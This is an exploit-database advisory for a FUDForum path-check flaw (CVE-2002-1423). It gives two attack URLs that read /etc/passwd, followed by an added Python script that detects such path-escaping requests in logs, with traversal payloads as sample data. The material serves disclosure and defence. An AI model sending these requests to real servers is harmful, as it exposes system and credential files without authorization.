Exploit Ilia Alshanetsky FUDForum 1.2.8/1.9.8/2.0.2 - File Disclosure

Exploiter

18 Dec 2022
EDB-ID: 21723
EDB Verified: Passed
Author: ULF HARNHAMMAR
Vulnerability type: WEBAPPS
Platform: PHP
CVE: CVE-2002-1423
Publication date: 2002-08-19
Code:
source: https://www.securityfocus.com/bid/5501/info

Reportedly, FUDForum may disclose contents of arbitrary files to attackers. The vulnerability is the result of FUDForum failing to check the path of the file that is being requested. By simply making malicious requests via URI parameters, an attacker is able to obtain access to potentially sensitive files.

http://victimhost.com/tmp_view.php?file=/etc/passwd
http://victimhost.com/admbrowse.php?down=1&cur=%2Fetc%2F&dest=passwd&rid=1&S=[someid]
 
Source: www.exploit-db.com
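Added example (not part of the original advisory and not FUDForum code): a log-review check that applies the missing path-containment test to the two request shapes shown above. It also covers relative `../` paths, which the advisory does not show. The base directory `ALLOWED_BASE`, the host `forum.example` and the sample requests are assumptions constructed for illustration.

```python
import os
from urllib.parse import urlsplit, parse_qs

# Assumption: directory the forum is meant to serve files from (hypothetical path).
ALLOWED_BASE = "/var/www/forum/tmp"

def is_within(base, requested):
    """True if `requested`, resolved against `base`, stays inside `base`."""
    base = os.path.realpath(base)
    # os.path.join discards `base` when `requested` is absolute, which is
    # the case the advisory shows (file=/etc/passwd).
    target = os.path.realpath(os.path.join(base, requested))
    return os.path.commonpath([base, target]) == base

def requested_path(url):
    """Return the file path a request asks for, or None for other scripts."""
    parts = urlsplit(url)
    qs = parse_qs(parts.query)  # parse_qs percent-decodes the values
    script = parts.path.rsplit("/", 1)[-1]
    if script == "tmp_view.php" and "file" in qs:
        return qs["file"][0]
    if script == "admbrowse.php" and "cur" in qs and "dest" in qs:
        return os.path.join(qs["cur"][0], qs["dest"][0])
    return None

def flag_requests(urls, base=ALLOWED_BASE):
    """Return (url, path) pairs whose requested path escapes `base`."""
    hits = []
    for url in urls:
        path = requested_path(url)
        if path is not None and not is_within(base, path):
            hits.append((url, path))
    return hits

# Constructed sample requests (not real traffic).
SAMPLE = [
    "http://forum.example/tmp_view.php?file=/etc/passwd",
    "http://forum.example/admbrowse.php?down=1&cur=%2Fetc%2F&dest=passwd&rid=1&S=abc",
    "http://forum.example/tmp_view.php?file=upload_123.txt",
    "http://forum.example/tmp_view.php?file=../../../etc/passwd",
    "http://forum.example/index.php?t=msg&th=1",
]

if __name__ == "__main__":
    for url, path in flag_requests(SAMPLE):
        print("outside base:", path, "<-", url)
```

The same `is_within` test, done server-side before the file is opened, is the check the advisory says is missing.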